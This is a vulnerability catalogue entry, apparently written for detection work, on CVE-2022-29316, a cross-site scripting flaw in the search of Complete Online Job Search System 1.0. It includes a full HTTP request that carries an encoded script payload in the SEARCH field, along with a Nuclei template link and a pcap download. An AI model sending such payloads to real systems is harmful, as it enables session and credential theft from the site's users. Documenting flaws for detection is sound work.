🔙 목록으로 돌아가기

CVE-2022-29316: Complete Online Job Search System 1.0 - Cross-Site Scripting

TitleComplete Online Job Search System 1.0 - Cross-Site Scripting
Authorarafatansari
SeverityHigh
ImpactAttackers can inject malicious JavaScript through the search functionality, potentially stealing session cookies and credentials from job seekers and employers using the platform.
RemediationUpdate Complete Online Job Search System to a patched version that properly sanitizes search parameters and encodes output to prevent XSS attacks.
CVSS Score7.2
EPSS Score0.54326
CVE IDCVE-2022-29316
CWE IDCWE-79
Tags cve cve2022 xss eris sqli vuln

🔍 Vulnerability Description

Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch.

🌐 HTTP Request

POST /index.php?q=result&searchfor=advancesearch HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29316.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-29316.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A